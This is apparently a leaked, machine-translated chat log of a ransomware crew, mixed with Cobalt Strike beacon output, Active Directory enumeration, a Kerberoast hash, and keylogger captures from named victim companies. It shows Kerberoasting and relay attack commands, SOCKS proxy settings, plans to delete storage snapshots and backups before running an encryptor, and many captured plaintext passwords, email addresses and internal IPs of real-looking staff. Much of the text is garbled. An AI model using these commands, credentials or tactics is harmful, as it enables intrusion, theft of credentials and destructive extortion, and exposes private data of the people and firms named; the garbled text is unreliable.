ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DirectoryServicesCOMException
ERROR:

``Really?'' I saw it the first time, too. Where's the invoc kerb on trusts? ```
dn:CN=tsi.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2011/11/12-21:30:09 UNKNOWN TZ
>name: tsi.zohocorpin.com
>securityIdentifier: S-1-5-21-485680246-861548126-816136305
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: tsi.zohocorpin.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=en.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2017/12/31-13:18:45 UNKNOWN TZ
>name: ru.zohocorpin.com
>securityIdentifier: S-1-5-21-923540578-3079758315-1995498360
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ru.zohocorpin.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
``Where are the trusts? OK, missed it apparently, never mind, but for future reference again - psinject is better than powerpick:woozy_face:``
beacon> powerpick invoke-kerberoast | fl
[*] Tasked beacon to run: invoke-kerberoast | fl (unmanaged)
[+] host called home, sent: 133715 bytes
[-] could not spawn C:\WINDOWS\sysnative\mstsc.exe: 5
[-] Could not connect to pipe: 2


beacon> psinject 24992 x86 invoke-kerberoast | fl
[*] Tasked beacon to psinject: invoke-kerberoast | fl into 24992 (x86)
[+] host called home, sent: 125019 bytes
[+] received output:


TicketByteHexStream :
Hash : $krb5tgs$http/its-winca.csez.zohocorpin.com:2DE4E99FA6FA6FA68CC689ABB47E0A6F97A
                       $62CF27C5AB593341D3B81B5F5BBCAA82925936965DE779974EE5D9923A4463AB3AAC63712F8
                       AC686D7193085E3B65354BB01B206F486C8DFDAD4531340B194A139C6ACE7BCAEC0E5BFA8F6F
                       056E78530335D087197D488628A16DB5732A440C6AA5E5C3A075F9DD6D35828DD52F49D56DBA
                       F45A7961229719149BF41084852247F8218EF29AD26227013FEAF80446DEE2D7D8B0DE37D6D3
                       8D4E0B6210C5574193987229D4B56BAE3DB0D93BC51CF4EC46F6EDCE0F12F8ADF9A73AD3242E
                       3F727E16CEAE7B5C2A629A6EFAD4C13DF512C7B6E61C818D7CB23E5C229A97A43794559F0FF2
                       58F53EF5C8E9D5D2D70FCBDC531B60C5A883D5618FD4AF4D39ECB105359492C8FA6C7064C9FB
                       DAC355868D6DCCAB5A73BE7C23EFF30F174AE1CCD12A1A5D057B385214B847A625A8ACAAA9E5
                       C5568B7D2D19ED68ACA10685A739E12A758DF6111E9160681618BC37BC24FCCFBA1E6AADFF3C
                       B0F00B635C1E143A84F22E72B27FFD104F589C557DFAF79621014976E4E580B6789A6D97932F
                       0EAEC59393D64A9C1DA4572CDCD6C1F78A16426695EBF51A2C978039B273B4AE0779B3168A7F
                       50CF65541DC98D548907E1C58E04C54F5FF39C27759800CFA8B401A777786F28774BBD01A1AB
                       CC0DEDA88201FB6C11EA6C5F60919803D4F3238ED543B9F4B9B3139D3FF102C72C6DFD1E8DBA
                       C11A46344A45ECA49EB45C70C9431571AA14E7B340CFD54DFC7D290068708EB64EFE74BA3EFE
                       7A292ACAC6DA8E8BB9F0BCEE85D3FE389F854E66AE34587845C063DEE2A0AB6812C3A42CDFE2
                       7494F46E38B41C0BEDEB118A3EFB5ADF2088E92C3B19FCB2211443CFD240A718293B194B0CCF
                       2F3E03DE23E80AA1B025C6881814153E8B747097D07841813372284DA9F49BF6D449036C8741
                       8F19339E029B7119E9BA8400B5AB5834E13D7521403108E24C06B96674D014F1296D9EDCF916
                       2E71FB2786013E934719E2530D9FC854EEFFA748AAB0873F9F923F3AAECF11C2EBE5E79D6CEB
                       F8494096F73BB8A01332CD999FA48D5F92E639C21E62D1AD3B6AA650840AA2370239B806D201
                       0DF25292FF9A23827E3D642EF377BFDEE2E7DD9C6E30C3725C82D4DA58E670AE117A8D649A1F
                       2F6C241B1CED24A5ACD42C153223C3047CCF736CB4503D3659110334A5D3F1B8D477A20D3FC5
                       2A5E82B9211116D511940BE9FC84084A3C09E132570F88C63B0B117E12B596FDA44CD79AD5D7
                       E960C5C41C85DF4C5AEC9A6F728FCC3645DE6548393D1924B0360C406A807449CE7471659221
                       1EB1763E6718A2838761A05ACC8B02418E1DF57E1080F41CB6F5EEA90979BF969BE2EF91826F
                       84C29AA15B0BBD66E83662C4EE9F12F0DEA7F4E128F7FF4324EF999B6A6B4EFA34859BEA6140
                       394AE19A9A1EC83D9A03E2CDDE651262D3033CD846EAACA9E5D6A8D054A1D9A85133875B14B5
                       B64C10A3E7DB5E29E3C99A1101AA50BA231455E0AAC4F69603ABC93379E3404792A65C7A93CE
                       18D5AF6E666FCF9E4B8C28CD22371F71CD349C0D4DA0DB27898065D389491B37B89DD67364EE
                       B82D8F677730EFE646BEB35CE968C0EEBFC7ED5A076F5924AC6ABE5E2D776DC2E49
SamAccountName : certsrv
DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com




[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt
[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt
Why do you keep using powerpick instead of psinject? I'm writing INVOKE-KERBEROAST, what does this have to do with Invey?
beacon> powerpick Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target 172.20.3.7 -Command "tasklist" -Attack Enumerate,Execute,Session
[*] Tasked beacon to run: Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target 172.20.3.7 -Command "tasklist" -Attack Enumerate,Execute,Session (unmanaged)
[+] host called home, sent: 133715 bytes
[-] Could not connect to pipe: 2
``That's right, so on any error - command and output immediately in the message to the confpowerpick Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target 172.20.3.7 -Command "tasklist" -Attack Enumerate,Execute,SessionPossible I start wrong immediately command -invoke does not work and can work with Rubus)Rubus better
the invoc kerberost on trusts does not work as i remember try to set invoc kerberost on trusts
dn:CN=tsi.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2011/11/12-21:30:09 UNKNOWN TZ
>name: tsi.zohocorpin.com
>securityIdentifier: S-1-5-21-485680246-861548126-816136305
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: tsi.zohocorpin.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=en.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2017/12/31-13:18:45 UNKNOWN TZ
>name: ru.zohocorpin.com
>securityIdentifier: S-1-5-21-923540578-3079758315-1995498360
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ru.zohocorpin.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
``Do you have any dtrusts?'' have done ad_find, seatBelt, ChromeSharp, winpeas, rebeus, Inveit, tried every possible exploit.user9user7user2user1vind 2008
```
hpacc-control.localzoho.com [172.20.3.7]
tally-server.csez.zohocorpin.com [192.168.206.51]
finance-server.csez.zohocorpin.com [192.168.112.132]
est-av-server.csez.zohocorpin.com [192.168.100.68]
print-server-bk.localzoho.com [172.20.3.7]
est-it-storage.csez.zohocorpin.com [192.168.100.74]
printserver.csez.zohocorpin.com [192.168.100.206]
integ-i18n.csez.zohocorpin.com [192.168.113.56]
vcenter.localzoho.com [172.20.3.7]
win2k8adc.localzoho.com [172.20.3.7]
```
https://adsecurity.org/?p=1255НетДА not yet? ``OU=Domain Controllers``
```
ruestadc.localzoho.com [172.20.3.7] (Windows Server 2012 R2 Standard)

tsi-csez-adc.csez.zohocorpin.com [192.168.65.81] (Windows Server 2012 R2 Standard)

est-adc2.csez.zohocorpin.com [192.168.100.93] (Windows Server 2012 R2 Standard)

est-adc.csez.zohocorpin.com [192.168.100.61] (Windows Server 2012 R2 Standard)

win2k12master.csez.zohocorpin.com [192.168.100.27] (Windows Server 2012 R2 Standard)
``\\\CROCKETSTORAGE\D$\Shared\AlloyCrkt01 Data\Shared\MS Outlook PST Backup Utility```
>title: Generic
>title: Network
>title: Systems Administrator
>title: Senior Help Desk & Application Specialist
>title: Network
>title: Maintenance Manager
>title: Maintenance Manager
>title: Production
>title: IT Manager
>title: Lab Manager
>title: Web Designer
>title: Production
>title: QA Manager
>title: Material Handler WH
>title: Production Manager
>title: Inside Sales Person
>title: Planning Specialist
>title: VP Manufacturing, RTP
>title: Engineering Manager
>title: Texas Manufacturing Leader
>title: Network
>title: President
>title: Production
>title: Production
>title: Production
>title: Production
>title: Warehouse
>title: Production Supervisor
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Production
>title: Material Operator
>title: Associate Relations Manager
>title: Maintenance Supervisor
>title: Production Supervisor
>title: Material Handler
>title: Production
>title: Production
>title: Maintenance
>title: Production
>title: Maintenance
>title: Lab Technician
>title: Lab Tech
>title: Lab Tech
>title: Receiving
>title: Production Supervisor
>title: Maintenance Lead I & E
>title: Production Supervisor
>title: I & E Technician
>title: Warehouse
>title: Lab Technician
>title: Warehouse
>title: Material Handler
>title: Accounting AP Clerk
>title: President of Operations
>title: Material Handler WH
>title: Training Specialist
>title: Production Supervisor
>title: Tool Room
>title: Shipping & Receiving Coordinator
>title: Tool Room
>title: Mechanic
>title: Operator
>title: Operator
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Electrician
>title: Tool Room
>title: Tool Room
>title: Purchasing Coordinator
>title: Maintenance Lead
>title: Lab Tech
>title: Lab Tech
>title: Operator
>title: Mechanic
>title: IT Coordinator
>title: Test User
>title: Production
>title: Lab Tech
>title: Material Handler Receiving
>title: Material Handler WH
>title: Shift Supervisor
>title: Production
>title: Production
>title: Production
>title: Shipping & Receiving Coordinator
>title: Production
>title: Process Engineer
>title: Production Supervisor
>title: Maintenance Material Coordinator
>title: Production Supervisor
>title: Lab Tech
>title: Lab Tech
>title: lab tech
>title: Production Supervisor /QC
>title: Production Supervisor
>title: Quality Lab Assistant
>title: Logistics
>title: Shipping & Receiving
>title: Warehouse Tech
>title: Color Technician
>title: Production Supervisor
>title: IT Manager
>title: Lab Supervisor
>title: Corp. Quality Manager
>title: Production Tech
>title: Operator
>title: Warehouse Tech
>title: Blending Associate
>title: Orange Site Manager
>title: Consultant
>title: Material Handler
>title: Maintenance Tech
>title: Production C Shift
>title: Operator
>title: Material Handler
>title: Operator
>title: Maintenance Supervisor
>title: Maintenance Supervisor
>title: Maintenance
>title: Lab Tech
>title: ToolRoom HandGun
>title: Gah Production
>title: Tool Room
>title: Maintenance
>title: Production
>title: Maintenance
>title: Maintenance
>title: RailRoad
>title: RailRoad
>title: Operator
>title: Office Administrator
>title: Gahanna Lab
>title: Finance Director
>title: Production
>title: Accounting AP Clerk
>title: Finance Director
>title: Verification Tech
>title: Finance Director
>title: Production Tech
>title: Maintenance Tech
>title: Lab Tech
>title: Finance Director
>title: Finance Director
>title: Purchasing
>title: Purchasing
>title: Finance Director
>title: Logistics
>title: Lab Tech\Production
>title: Maintenance Tech
>title: Maintenance Tech
>title: Maintenance Tech
>title: Maintenance Tech
>title: Operator
>title: Housekeeping Tech
>title: Production
>title: Maintenance
>title: Janitorial
>title: Material Handler
>title: Material Handler
>title: Maintenance
>title: Electrician
>title: Material Handler
>title: I & E Technician
>title: Production
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Production Supervisor
>title: Warehouse
>title: Office & Associate Relations Manager
>title: Maintenance Leader
>title: Mechanic
>title: Material Handler
>title: Operator
>title: Production Tech
>title: Material Handler
>title: Electrician - Mechanic
>title: Operator
>title: Maintenance Tech
>title: Production Tech
>title: Operator
>title: Lab Tech
>title: Production Tech
>title: Production Tech
>title: Operator
>title: Operator
>title: Electrician
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: President of Operations
>title: Production Tech
>title: Production Tech
>title: Production Tech
>title: Production Tech
>title: Production Tech
>title: Production Tech
>title: Production Tech
>title: Associate Relations Manager
>title: Maintenance
>title: Production Operator
>title: Production Tech
>title: Production Manager
>title: Production Tech
>title: Material Handler
>title: Material Handler
>title: Lab Tech
>title: Production Tech
>title: Shipping & Receiving
>title: Material Handler
>title: Production Tech
>title: Warehouse
>title: Warehouse
>title: Production Tech
>title: Lab Tech
>title: Material Handler
>title: Material Handler
>title: Operator
>title: Operator
>title: Material Handler
>title: GAHBreak Room
>title: Production
>title: Material Handler
>title: Operator
>title: Warehouse
>title: I & E Technician
>title: Material Handler
>title: Material Handler
>title: Warehouse
>title: Operator
>title: Purchasing
>title: Logistic supervisor backup
>title: Production Tech
>title: Corp. Quality Manager
>title: Operator
>title: Shipping & Receiving Material Handler
>title: Operator
>title: Operator
>title: Operator
>title: Production Tech
>title: Operator
>title: Lab Tech
>title: Production Tech
>title: Material Handler
>title: Material Handler
>title: Housekeeping Tech
>title: Production
>title: Richmond Plant Manager
>title: Production Supervisor
>title: Lab Tech
>title: Production
>title: Symantec
>title: Preventative Maintenance Tech
>title: Verification Tech
>title: Warehouse
>title: Material Handler
>title: Operator
>title: Production Tech
>title: Production Tech
>title: Operator
>title: Operator
>title: Production
>title: Maintenance Tech
>title: Production Tech
>title: Shipping & Receiving
>title: Warehouse
>title: Asset Essentials Work Request
>title: Production Clerk
>title: Warehouse
>title: Warehouse Lead
>title: Operator
>title: Operator
>title: Operator
>title: Operator
>title: QA Technician
>title: Maintenance Supervisor
>title: QA Technician
>title: Production Clerk
>title: Maint Tech
>title: Maint Tech
>title: Maint Tech
>title: Material Handler
>title: Lab Tech
>title: Lab Tech
>title: Warehouse
>title: Lab Tech
>title: Tx Enviromental & Safety
>title: Quality System Specialist
>title: Maintenance
>title: Gah Production
>title: Lab Tech
>title: Lab Tech
>title: Electrician
>title: HR
Good night until tomorrow at 2 session in sliptoe then we'll leave it for tomorrownea, dk also no available news? the rest tomorrow and if past then we all wait 20 minendomen did not rise? yeah i also have all fallen out of my sliptoe, although it pings by name ...no, he needs to change the ns record, so the computers will see the new dk. if the dns liveauthentication failed? he probably raised the external, so that at least something in the network to work and you can understand what's happening and external and dk looks like an external ips `https://192.168.0.254/````
Pinging wwdc1.waterway.com [104.130.139.13] with 32 bytes of data:
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50

Ping statistics for 104.130.139.13:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 19ms, Maximum = 19ms, Average = 19ms
```
```
Pinging wwdc2.waterway.com [104.130.139.13] with 32 bytes of data:
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50

Ping statistics for 104.130.139.13:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 19ms, Maximum = 19ms, Average = 19ms
```
```
9512 beacon> shell net accounts /dom
[*] Tasked beacon to run: net accounts /dom
[+] host called home, sent: 48 bytes
[+] received output:
The request will be processed at a domain controller for domain waterway.com.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.
``No autorization is up yetThe whole company is fucked. What's the situation? No autorization is up yet? Is it up yet?
Waterway
11915Wnas2179!
````http://192.168.0.3:5000/ ``192.168.62.30:5000`` and you only wiped nimble? OK, then this way. I thought it was easier to exchange info like this off-line. You're not alone here. Why should I send everything to you?
Waterway IT - Agent - Mozilla Firefox
=======
LoveUnit14!
[backspace]
[backspace] so we are hoping [backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace] [backspace].

LastPass - Set Master Password - Mozilla Firefox
=======
LoveUnit14[tab]88Maybe253![control][ctrl]a77Maybe253![backspace]*!77Maybe253*!7M*!

My LastPass Vault - Mozilla Firefox
=======
77Maybe253*!
77Maybe253*!


LogMeIn Accounts - Mozilla Firefox
=======
31444895591155163

Waterway Gas & Wash - Mozilla Firefox
=======
77maybe253*!
77Maybe253*!
´´20 min periodjust monitor on the topic of network disconnectiondomain authorization mb will fix))) and watch on the topic? or something else? bitch) youtubchik watchkak their situation? not sure yet found in their downloads one more pst accountant on 223 megabytes@tl1 i will encrypt the admin cars, they have backups there can locally take the files it seems their networka lot we there nabakapili? 1 the fuck for all the cashes support processiongbpltw but will be experienced of course turned out ...+nimble to 0?
We can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential, you can sign in with that credential.

I'm looking, but there's no such thing as a counterpart of the kazina. You can't restore it by yourself, can you?
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain waterway.com.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.

is the domain down? is the shara working in parallel only with the token will get in trouble now we'll pull what's pulling and let the buildd go now let it all go
most likely not all unshared because with dk launched bild? orbs and bild one bild by one batton so on the list of armies let but do not start tell me how to run the bild will be snapped by three there start the more the better let a few pieces of armies only armies remained ...if they killed all the servers and will decide from there what to expect, they will now go to the nimblys to wait for the nimblys then let the armas? + all the virtuals have died? in a hurry once started delete the snaps in any case ahahahaanywhere the fuck it looks like the nimblys not snapshodu we crash the servers along with the volume on the nimblys have crashed?
beacon> shell ping -n 1 192.168.0.192
[*] Tasked beacon to run: ping -n 1 192.168.0.192
[+] host called home, sent: 54 bytes
[+] received output:

Pinging 192.168.0.192 with 32 bytes of data:
Reply from 192.168.0.122: Destination host unreachable.

Ping statistics for 192.168.0.192:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

``the spare koba''.
173.234.155.15
https://avsix.com
----------------------------------------------------------------------------------------
206.221.188.106:63254
edbDkh6n9sCjfeYJLyFby0q5tKCzuscVSnj
but i can't find it, i can't read it properly, i should have turned it off, but @user4 wrote it, no way did you delete it?[ ](https://mediaeveryone.com/group/waterway-com?msg=mG4g2Ci86s7PZ5c7y) this is what's bothering me, as long as it's connected, it won't let me delete it, did you delete it?ahahahahaha ran pre.bat all over adpogonali guys also three other external backs were? pogonalipognaidak what the fuck, and there and armas will be unshared all i let delete snaps how long will be sharya? on 1 ping request could not find the site well fuck with nimin 4 annichabel from most hosts + and psek past? on 4 no 445 was 1619 servers was not it?dak their 7 tamas you are operational) and then at the moment erase snaps and startuparms are unsharedSIDH*G&8SDIGvS*DIF^*GSHIGUYRHservers are theretoyou do network but at the moment when the servers will be pulled under 0 i think so too, yes, it is written that snapshots of their virtuals in another place?and inside? nice to find) check the contents of the live ones,just a cluster is not virtuals? all the backups will delete everything?and a maximum of 10 minutes here time is not on the clock to lock or unlock the pc + run pre.bat run the lockerinternaldelete externals all in one moment all in one placeaha ok, the secondParsons smoking is the second? 
waterway.com



WIN SERVER:

by AD: 16
Alive: 11 (including those without 445)
Attracted: 7

no 445:
    PDITESTSQL.waterway.com
    reporting.waterway.com
    WWSQL2Old.waterway.com
    wwsql02.waterway.com

Destination host unreachable (I pinged from different hosts, this is the case everywhere):
    PDIProdWeb2016.waterway.com
    WW2K1Old.waterway.com
    WWSQLOLD.waterway.com
    WATERWAYDSC02.waterway.com



ARMS:

AD: 294
Alive: 200
``When``brandon`` is login`11915Ns2179!!!`` pass from nibble what else on keylog? keylog fucks up some of the characters``setg Proxies socks4:172.93.105.2:48307```115279[tab]1Ns1!1915N29!s17[tab]19N79![tab]115s21!115N219s17[tab]19159!1N179!!11s217s2[tab]195N9!!!No, I doubt it. I'll try it now, but why are you using it to throw socks? Yeah, did you try the one above?
and all passwords that were this one? 11915ITMan2179! no it does not work check all combinations with his account by username[ ](https://mediaeveryone.com/group/waterway-com?msg=94ftydX3Phhq5H7AG) aha here are usernames+ with a dog in nimble him on the screen at least so blauerbradon you have tried under what? administrator what else is in questionneither this pass did not work? 195N9!! none of them fit?
+) Waterway Gas and Wash | Slack
=======
Nobogi t [backspace]sin nto tnbe[backspace]he imle pls. [backspace] aeI [backspace]I[backspace][backspace] ao [backspace][backspace][backspace][backspace]Im ns[backspace][backspace]s lokIt i ced w [backspace]t[backspace]te momdona [backspace]t hent. [backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace][backspace][backspace] [backspace] [backspace] [backspace] [backspace]tr [backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] y toI o [backspace][backspace]kowdnt't n who s calliait bing bout yt i doesma nyI[backspace]u not kea sense.   it isathink [backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace] oensmoeTis[backspace][backspace][backspace] o[backspace
 I [backspace][backspace]t[backspace]It sdl[backspace][backspace][backspace]p[backspace][backspace][backspace][backspace]founs ik[backspace]his[backspace][backspace][backspace][backspace][backspace]e fih[backspace][backspace]elss[backspace]phicyisyto meTer wo[backspace]h[backspace][backspace][backspace]s[backspace]h . heud noreal be s[backspace]ftem d[backspace]all. on or h to comeoeoc. I a[backspace]sn t allv[backspace]vloehae ckdtnfrn i dow o ow.


New Tab - Google Chrome
=======
.8

New Tab - Google Chrome
=======
19216.0.75



=======
m[backspace][backspace]


=======
nibil[backspace]e[backspace][backspace][backspace][backspace][backspace]19218[backspace][backspace][backspace][backspace].60.7[backspace][backspace][backspace].755[backspace]0.2[backspace]

192.168.0.75 - Nimble Storage - Google Chrome
=======
91

192.168.0.75 - Nimble Storage - Google Chrome
=======
115279[tab]1Ns1!1915N29!!s17[tab]19N79![tab]115s21!115N219s17[tab]19159!1N179!!11s217s2[tab]195N9!!

New Tab - Google Chrome
=======
192.

New Tab - Google Chrome
=======



Privacy error - Google Chrome
=======
192

BdTrayInvWindow
=======
[alt]

BdTrayInvWindow
=======
[alt]

Cortana
=======
e

Cortana
=======
not


Untitled - Notepad
=======
[ctrl]v

Untitled - Notepad
=======
[control]

(+) Waterway Gas and Wash | Slack
=======
Wa C

(+) Waterway Gas and Wash | Slack
=======
htP has[backspace][backspace][backspace][backspace]aacs[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace]hs ces[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace]iyou uat you srd?Dd pde[backspace]drpaswo Reve [backspace][backspace][backspace][backspace][backspace][backspace]mv[backspace]o[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace]

All Devices - Google Chrome
=======
12.168[down]


All Devices - Google Chrome
=======
9[down].

New Tab - Google Chrome
=======
218.0


New Tab - Google Chrome
=======
19.6.

Cortana
=======
d

Cortana
=======
mc[backspace][backspace][backspace][backspace]cmd


Command Prompt
=======
nettat


Command Prompt
=======
s

Cortana
=======
mc

Command Prompt
=======
louparkt

Cortana
=======
d


Command Prompt
=======
nsok meing


All Devices - Google Chrome
=======
tor

All Devices - Google Chrome
=======
se

Remote Desktop Manager Free [wwsql]
=======
c


Remote Desktop Manager Free [wwsql]
=======
[down]

All Devices - Google Chrome
=======
e

All Devices - Google Chrome
=======
mik

(+) Waterway Gas and Wash | Slack
=======
Yee nade it

(+) Waterway Gas and Wash | Slack
=======
s I creatdo nd add tothet puwopojshosh rect[backspace][backspace][backspace][backspace][backspace][backspace]pot rjec.ale rtrady ceae tdiadn D yunido eei[backspace][backspace]som io ri? d nenffom t

Why not[ ](https://mediaeveryone.com/group/waterway-com?msg=6PW4HbwfGTT4T5933) change all passwords[ ](https://mediaeveryone.com/group/waterway-com?msg=mdGqYwYbvv8fgZwx8) give me the full log, then nimbles can be turned on to block our access, they see where the letter came from until they wake up at the time to block your backup system to enter?i have locked it down promises not to lock it so he says it's a bad letter, i don't know what kind of letter it is
the other one1 asks what it is, a ticket or a voicemail
the first responds so it throws our message does not seem it forwarded from the incident with the password to the same RE see this file our message that we sent a file? [ ](https://mediaeveryone.com/group/waterway-com?msg=qCu3zj4Msa5t28oTk) fix where was the passkey, does not fit this passkey should be115s21! check it) ``
New Tab - Google Chrome
=======
19216.0.75



=======
m[backspace][backspace]


=======
nibil[backspace]e[backspace][backspace][backspace][backspace][backspace]19218[backspace][backspace][backspace][backspace].60.7[backspace][backspace][backspace].755[backspace]0.2[backspace]

192.168.0.75 - Nimble Storage - Google Chrome
=======
91

192.168.0.75 - Nimble Storage - Google Chrome
=======
115279[tab]1Ns1!1915N29!!s17[tab]19N79![tab]115s21!
``````
]Hey Latoya,

Unfortunately, we do not know what the password for this would be as it was originally set by someone in CCC>[backspace][backspace]. My c[backspace]recomendation, if n[backspace]no one knows the password, woul dbe to follow the forgot password instruction[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][link/[backspace][backspace][backspace][backspace]te[backspace]re[backspace]uctions using [control][ctrl]v
```
```
Please let me know if you need anything else from us ot [backspace][backspace]r[backspace]or if you have
``Any pass?
Mail - mpusatera@waterway.com - Google Chrome
=======
1853[backspace][backspace][backspace][backspace][backspace][backspace][backspace]Gators1853[tab]Morgan914[tab]Morgani[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][Morgan914

Outlook - Google Chrome
=======
Morgan914


New Tab - Google Chrome
=======
change outlook
```
this must be the new email password mapusateramharper[ ](https://mediaeveryone.com/group/waterway-com?msg=AenPRtGWoPZW39ARz) whose keylog?
192.168.0.75 - Nimble Storage - Mozilla Firefox
=======
administrator[tab]1854[backspace]3Gatr[control][ctrl]a1853Gators
mharper[tab]LoveUnit14*[tab][tab][tab][right]@waterway.com
LoveUnit14*


SQL Search - Microsoft SQL Server Management Studio
=======
[ctrl][control]v
``Slash starta hai bezi with mailoni also pick up``
192.168.0.75 - Nimble Storage - Mozilla Firefox
=======
administrator[tab]1854[backspace]3Gatr[control][ctrl]a1853Gators
mharper[tab]LoveUnit14*[tab][tab][tab][right]@waterway.com
``Task is just catching100%will they be changing the shumihalovym)well hz, they wrote that they serviced a couple of months ago and probably changed the I think you locked the admin account then...wait lol)no, he tried to log in as admin\administrator caught the access?blauer[ ](https://mediaeveryone.com/group/waterway-com?msg=vZuDXyXu9LuYCpFn3) who's sitting here? well this reverse timer says he didn't send it so i'll try to authorize under this pass nibblewith nibblewith nibblewith dc, not that he logged in?
Remote Desktop Manager Free [wwdc1]
=======
[down]
con[down][up]t
ateray99!
Wwill1Vana2
```
monitor the ``bluetooth``.
Waterway IT - Agent - Google Chrome
=======
i ou[backspace]osrth [backspace]n udo[backspace]i ta ha dthh balot wng e
``and specifically she's got the keylogger up crookedly she's logging in chicly everything's under control @user7 I think I've got the harperMark and Brandon
192.168.0.75 - Nimble Storage - Google Chrome
=======
to15

192.168.0.75 - Nimble Storage - Google Chrome
=======
[backspace]

192.168.0.75 - Nimble Storage - Google Chrome
=======
r8

192.168.0.75 - Nimble Storage - Google Chrome
=======
Gs

192.168.0.75 - Nimble Storage - Google Chrome
=======
3
``))))) on runettesI looked at my last pass and the last thing I had for this is administrator and the administrator password for this connection.
 
I think a couple months back that Mark and Brandon were doing some maintenance and they might have had to reset this not sure though.  They might know it.  I mean I would hope so at this point.... so they don't know the password themselves) says "fuck me" in the last one.
192.168.0.75 - Nimble Storage - Google Chrome
=======
a

Inbox - djarden@waterway.com - Outlook
=======
Ila as a [backspace][backspace] frhimstt dsdor[backspace]ftkac t MndBnow dno [backspace]t [backspace]tnc y h u ho[backspace]wi [backspace][backspace] iath ith mn o lo a s pin[backspace][backspace].

Waterway IT - Agent - Google Chrome
=======
 bl i edal
``Yeah noticed before it was fine and stood up crvokstat says the connection is wrong What the fuck is not keylogging? and I do not understand the fun) go to the screenshots it does? only this caught ``
192.168.0.75 - Nimble Storage - Google Chrome
=======
a
Did it come in or not?
Inbox - djarden@waterway.com - Outlook
=======
ik


=======
6[backspace].

192.168.0.75 - Nimble Storage - Google Chrome
=======
a

Inbox - djarden@waterway.com - Outlook
=======
Ila as a [backspace][backspace] frhi
Wait)) and wait for the pass from there)) if not tomorrow morning, then wait for the moment, there are messages in the mail? judging by the keylogger not much they are going there then close the network if the pass nimble pops up then do ``
setg Proxies socks4:209.222.97.8:6731
``Give the socks workers no alerts or not``?
[-] screenshot from desktop 2 is empty
 
  CurrentUser : WATERWAY\mapusatera
  Idletime : 00h:04m:33s:063ms (1326343 milliseconds)
``empty`` - nothing in the keylog, did any of the mail have a nimble login alert? Nothing else?
Waterway Gas & Wash - Mozilla Firefox
=======
michaelpusatera@gmail.com[tab]w[backspace]w@terw@y
w@terw@y
``````
Waterway Gas and Wash | Slack - Google Chrome
=======
does anyone recod[backspace]gnize this email adre[backspace][backspace]dress? [control][ctrl]v
All, I removed some old accounts from the internals [backspace][backspace] site / API.  I t[backspace]dont'[backspace][backspace]think this should cause any issues as the [backspace][backspace][backspace]i don't thin[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][a[backspace][backspace][backspace][backspace][backspace] since any of the accounts have been used recently.  if you notice any issues, please let me know.
``Not on the phone by any chance?
there's someone in the mail complaining about a phish letter from bobane to mail@tl1 but who sent the letter ?
